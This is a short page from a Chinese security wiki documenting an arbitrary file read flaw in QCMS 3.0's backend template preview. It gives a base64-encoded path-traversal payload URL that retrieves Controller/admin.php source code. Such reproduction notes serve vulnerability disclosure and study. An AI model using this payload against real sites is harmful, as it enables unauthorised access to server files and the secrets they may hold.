menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 109-QCMS chevron_right 004-QCMS 3.0 任意文件读取.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    004-QCMS 3.0 任意文件读取.md
    516 B / 2021-07-17 00:01:30
        # QCMS 3.0 任意文件读取

### 一、漏洞简介

### 二、漏洞影响

QCMS 3.0

### 三、复现过程

用seay扫了一下后发现的漏洞

漏洞在后台模板代码预览处,构造payload例如


```bash
http://url/backend/template/tempview/Li4vLi4vLi4vQ29udHJvbGxlci9hZG1pbi5waHA=.html
```

即可读取Controller文件下admin.php文件源码

![](images/15893373797595.png)


跟源码对比下,确实是读到了

![](images/15893373855313.png)


**参考链接**

https://xz.aliyun.com/t/7269
    links
    file_download